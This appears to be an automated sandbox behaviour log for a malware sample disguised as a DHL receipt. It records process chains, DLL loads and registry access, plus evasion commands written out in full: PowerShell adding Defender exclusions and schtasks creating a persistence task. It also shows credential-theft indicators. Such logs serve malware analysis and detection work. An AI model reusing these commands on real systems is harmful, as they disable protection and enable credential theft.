                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmp99C5.tmpJump to behavior
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: DHL AWB Receipt_pdf.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: EhStorAuthn.exe, 00000013.00000002.4207261427.00000000029B6000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.2177984269.00000000029B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: DHL AWB Receipt_pdf.bat.exeVirustotal: Detection: 54%
                Source: DHL AWB Receipt_pdf.bat.exeReversingLabs: Detection: 42%
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile read: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmpC3B4.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmpC3B4.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
